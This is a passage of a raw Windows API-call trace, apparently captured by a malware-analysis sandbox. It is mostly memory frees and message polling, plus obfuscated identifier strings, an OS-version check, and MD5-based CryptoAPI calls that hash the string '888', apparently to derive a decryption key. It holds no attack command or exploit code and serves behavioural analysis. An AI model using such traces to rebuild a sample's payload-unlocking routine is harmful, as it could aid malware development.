0xb [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0138.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0138.451] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0138.451] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0138.451] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0138.451] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0138.451] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0138.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0138.451] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0138.452] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0138.452] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0138.452] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0138.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0138.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0138.453] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.453] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0138.453] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0138.453] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0138.453] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0138.453] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0138.453] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0138.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0138.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0138.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0138.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0138.453] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bea28) returned 1 [0138.454] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.454] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.454] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0138.454] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0138.454] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0138.454] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0138.454] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0138.454] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0138.455] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.455] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.455] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.455] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0138.455] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0138.455] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0138.455] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0138.455] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0138.455] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0138.455] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.455] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0138.455] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.455] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0138.455] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.455] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.455] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.455] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.455] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.455] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.456] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.456] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0138.456] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.456] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0138.456] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.456] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.456] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0138.456] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0138.456] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0138.456] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0138.456] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0138.456] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.456] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.456] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0138.456] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0138.456] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0138.456] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0138.456] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0138.456] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0138.456] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.456] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.456] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.457] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0138.457] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.457] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0138.457] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.457] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.457] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0138.457] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.457] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0138.457] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.457] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0138.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0138.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa2a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0138.457] CryptCreateHash (in: hProv=0x9bea28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0138.457] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.457] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.457] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.457] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0138.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71cb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0138.457] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0138.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0138.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ce8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0138.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.458] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0138.458] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.458] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0138.458] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.458] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.458] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0138.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0138.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa2e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0138.458] CryptHashData (hHash=0x9a4a40, pbData=0x2a71cf8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0138.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.458] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0138.458] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.458] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0138.458] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.458] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0138.459] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0138.459] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, 